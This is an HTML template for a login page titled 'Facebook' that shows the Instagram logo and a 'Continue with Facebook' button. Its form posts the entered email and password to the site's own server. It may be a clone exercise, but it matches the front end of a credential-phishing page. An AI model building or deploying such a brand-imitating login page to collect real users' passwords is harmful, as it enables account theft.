<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="stylesheet" href="/static/style.css">

</head>

<body>
    
    <div class='Box'>
        <div class='img1'>
        <img src="https://logos-download.com/wp-content/uploads/2016/03/Instagram_Logo_2016.png" class='image' alt="" />
        </div>
            <form action="/" method ="Post" class="box2">
             <input type="email" name="email" id="email" placeholder="Email addresh and Phon number" >    
             <input type="password" name="password" id="password" placeholder="password">
             
             
             <button class="btn">Log in</button>
             <p>Forget your login details?<span>Get help logging in.</span></p>
            <h4>OR</h4>
            </form>   
            <p>Forget your login details?<span>Get help logging in.</span></p>
            <h4>OR</h4>
        
        <div class="img2">
    <img src="https://www.edigitalagency.com.au/wp-content/uploads/Facebook-logo-blue-circle-large-white-f.png" class='image2' alt="" />
    <span class='span2'>Continue with Facebook</span>
        </div>
</div>
<hr />
<footer>Don't have an account?<span class='span3'>Sign up.</span></footer>
    
</body>
</html>